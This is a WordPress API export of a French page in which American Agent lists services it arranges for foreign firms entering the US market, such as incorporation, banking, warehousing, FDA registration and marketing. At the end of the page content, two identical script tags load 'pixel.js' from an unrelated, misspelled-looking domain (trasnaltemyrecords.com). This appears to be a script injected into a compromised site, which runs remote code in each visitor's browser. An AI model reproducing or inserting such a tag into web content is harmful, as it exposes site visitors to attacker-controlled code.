{"id":3131,"date":"2014-08-16T07:17:42","date_gmt":"2014-08-16T07:17:42","guid":{"rendered":"https:\/\/americanagent.com\/usa-business-support-services-2\/"},"modified":"2014-09-18T12:38:32","modified_gmt":"2014-09-18T16:38:32","slug":"bureau-et-support-a-la-vente","status":"publish","type":"page","link":"https:\/\/americanagent.com\/fr\/bureau-et-support-a-la-vente\/","title":{"rendered":"Bureau et support \u00e0 la vente"},"content":{"rendered":"<div  class='flex_column av-av_one_full-2a9015ff38129c418a3f2eafba3e9512 av_one_full  avia-builder-el-0  avia-builder-el-no-sibling  first flex_column_div  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_heading-70cffb73b8102de2acd1faefb840146f\">\n#top .av-special-heading.av-av_heading-70cffb73b8102de2acd1faefb840146f{\npadding-bottom:10px;\n}\nbody .av-special-heading.av-av_heading-70cffb73b8102de2acd1faefb840146f .av-special-heading-tag .heading-char{\nfont-size:25px;\n}\n.av-special-heading.av-av_heading-70cffb73b8102de2acd1faefb840146f .av-subheading{\nfont-size:15px;\n}\n<\/style>\n<div  class='av-special-heading av-av_heading-70cffb73b8102de2acd1faefb840146f av-special-heading-h3  avia-builder-el-1  el_before_av_textblock  avia-builder-el-first '><h3 class='av-special-heading-tag '  itemprop=\"headline\"  >Services de support<\/h3><div class=\"special-heading-border\"><div class=\"special-heading-inner-border\"><\/div><\/div><\/div><br \/>\n<section  class='av_textblock_section av-av_textblock-5423793a0e82d2455362b4eba580b48d '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p>Il est n\u00e9cessaire de prendre en compte certains services pour rendre votre pr\u00e9sence commerciale efficace.<\/p>\n<p>Ci-dessous une liste de quelques-uns de ces services, qui pourraient \u00eatre judicieux de consid\u00e9rer pour prendre au mieux vos dispositions.<\/p>\n<p>Ces services sont fournis par notre r\u00e9seau de collaborateurs approuv\u00e9s. Beaucoup de ces partenaires ont d\u00e9j\u00e0 travaill\u00e9s conjointement. Ce qui est un avantage non n\u00e9gligeable pour vous, car votre implantation commerciale aux \u00c9tats-Unis sera plus efficace et plus rapide, votre communication sera plus pertinente.<\/p>\n<p>La liste ci-dessous n&#8217;est qu&#8217;une pr\u00e9sentation de quelques-uns des mesures que nous sommes en mesure d&#8217;organiser en votre nom ici aux \u00c9tats-Unis.<\/p>\n<\/div><\/section><br \/>\n<div  class='avia-icon-list-container av-av_iconlist-e4a0ebdf966f1bea8883e87bb95dffd6  avia-builder-el-3  el_after_av_textblock  avia-builder-el-last '><ul class='avia-icon-list avia_animate_when_almost_visible avia-icon-list-left av-iconlist-big av-av_iconlist-e4a0ebdf966f1bea8883e87bb95dffd6 avia-iconlist-animate'>\n<li><div class='iconlist_icon av-av_iconlist_item-3b83c9c7c97970cef0b1594b806fc10d avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry av-iconlist-empty\"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Ic\u00f4ne : Enregistrement aupr\u00e8s des services am\u00e9ricains (limited liability company (LLC) \/ Compagnie \u00e0 responsabilit\u00e9 limit\u00e9e ou Incorpation (Inc.) \/ Entreprise)\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Enregistrement aupr\u00e8s des services am\u00e9ricains (limited liability company (LLC) \/ Compagnie \u00e0 responsabilit\u00e9 limit\u00e9e ou Incorpation (Inc.) \/ Entreprise)<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-0a8a086e255bf438e1e041f4345add34 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Ic\u00f4ne : Questions bancaires\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Questions bancaires<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>Facturation, recouvrement, comptabilit\u00e9 et pr\u00e9-d\u00e9claration des taxes (TVA taxe sur la valeur ajout\u00e9e, frais de douanes, taxe \u00e0 l\u2019importation\u2026) par des cabinets d&#8217;expert-comptables reconnus de Chicago.<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-98a566ec69e52ecbfac4e0ac09c51706 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Ic\u00f4ne : Bureau am\u00e9ricain\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Bureau am\u00e9ricain<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>Votre propre adresse et une ligne t\u00e9l\u00e9phonique d\u00e9di\u00e9e, afin de valoriser votre pr\u00e9sence locale.<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-4df2baf98aab0f3402892cdf728ae0b6 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Ic\u00f4ne : Entrep\u00f4t et stockage (y compris en chambres froides)\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Entrep\u00f4t et stockage (y compris en chambres froides)<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>Logistique et distribution sur tout le territoire national.<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-0e3c0f5b85c121c589233641d98b271c avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry av-iconlist-empty\"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Ic\u00f4ne : Services de garantie et retour produit\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Services de garantie et retour produit<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-603e2998381ff1ff305a44cc6bec8da8 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Ic\u00f4ne : Enregistrements aupr\u00e8s de la FDA (Food and Drug Administration)\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Enregistrements aupr\u00e8s de la FDA (Food and Drug Administration)<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>American Agent est reconnu comme \u00ab\u00a0agent local\u00a0\u00bb par la FDA.<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-a1ec4d0eb13c27072ebbac6c29561d45 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Ic\u00f4ne : Pr\u00e9sence aux salons.\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Pr\u00e9sence aux salons.<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>Les inscriptions, le marketing autour des \u00e9v\u00e9nements commerciaux d&#8217;envergure relatifs \u00e0 votre secteur d&#8217;activit\u00e9 (salon grand public ou professionnel) n\u00e9cessitent une infrastructure capable d&#8217;organiser, d&#8217;engager les personnes n\u00e9cessaires si besoin le temps de la manifestation.<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-c9b962d090bd9b2f00a75f3074c982e0 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Ic\u00f4ne : USA Marketing\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >USA Marketing<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>Pr\u00e9sence sur les sites Web locaux, traductions, brochures, catalogues, impressions, mailings&#8230;<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-45816764c341d61d7c68faa9f17117e7 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Ic\u00f4ne : Repr\u00e9sentation l\u00e9gale locale \"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Repr\u00e9sentation l\u00e9gale locale <\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>Surveillance pour tous contrats avec un partenaire : distributeurs, repr\u00e9sentants, clients.<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-a3be2374f18b37837172c463011e18cf avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry av-iconlist-empty\"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Ic\u00f4ne : Recouvrement des comptes en souffrance\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Recouvrement des comptes en souffrance<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-88b2048421d089256b20d1f8ddb97cb5 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry av-iconlist-empty\"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Ic\u00f4ne : Contr\u00f4les des ant\u00e9c\u00e9dents \u00e9conomiques des partenaires potentiels\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Contr\u00f4les des ant\u00e9c\u00e9dents \u00e9conomiques des partenaires potentiels<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<\/ul><\/div><\/p><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":4,"comment_status":"open","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-3131","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Bureau et support \u00e0 la vente - American Agent<\/title>\n<meta name=\"description\" content=\"Il est n\u00e9cessaire de prendre en compte certains services pour rendre votre pr\u00e9sence commerciale efficace.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/fr\/bureau-et-support-a-la-vente\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Bureau et support \u00e0 la vente - American Agent\" \/>\n<meta property=\"og:description\" content=\"Il est n\u00e9cessaire de prendre en compte certains services pour rendre votre pr\u00e9sence commerciale efficace.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/fr\/bureau-et-support-a-la-vente\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-18T16:38:32+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/bureau-et-support-a-la-vente\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/bureau-et-support-a-la-vente\\\/\",\"name\":\"Bureau et support \u00e0 la vente - American Agent\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/#website\"},\"datePublished\":\"2014-08-16T07:17:42+00:00\",\"dateModified\":\"2014-09-18T16:38:32+00:00\",\"description\":\"Il est n\u00e9cessaire de prendre en compte certains services pour rendre votre pr\u00e9sence commerciale efficace.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/bureau-et-support-a-la-vente\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/fr\\\/bureau-et-support-a-la-vente\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/bureau-et-support-a-la-vente\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Bureau et support \u00e0 la vente\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Bureau et support \u00e0 la vente - American Agent","description":"Il est n\u00e9cessaire de prendre en compte certains services pour rendre votre pr\u00e9sence commerciale efficace.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/fr\/bureau-et-support-a-la-vente\/","og_locale":"fr_FR","og_type":"article","og_title":"Bureau et support \u00e0 la vente - American Agent","og_description":"Il est n\u00e9cessaire de prendre en compte certains services pour rendre votre pr\u00e9sence commerciale efficace.","og_url":"https:\/\/americanagent.com\/fr\/bureau-et-support-a-la-vente\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-18T16:38:32+00:00","twitter_misc":{"Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/fr\/bureau-et-support-a-la-vente\/","url":"https:\/\/americanagent.com\/fr\/bureau-et-support-a-la-vente\/","name":"Bureau et support \u00e0 la vente - American Agent","isPartOf":{"@id":"https:\/\/americanagent.com\/fr\/#website"},"datePublished":"2014-08-16T07:17:42+00:00","dateModified":"2014-09-18T16:38:32+00:00","description":"Il est n\u00e9cessaire de prendre en compte certains services pour rendre votre pr\u00e9sence commerciale efficace.","breadcrumb":{"@id":"https:\/\/americanagent.com\/fr\/bureau-et-support-a-la-vente\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/fr\/bureau-et-support-a-la-vente\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/fr\/bureau-et-support-a-la-vente\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/fr\/"},{"@type":"ListItem","position":2,"name":"Bureau et support \u00e0 la vente"}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/fr\/#website","url":"https:\/\/americanagent.com\/fr\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/pages\/3131","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/comments?post=3131"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/pages\/3131\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/media?parent=3131"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}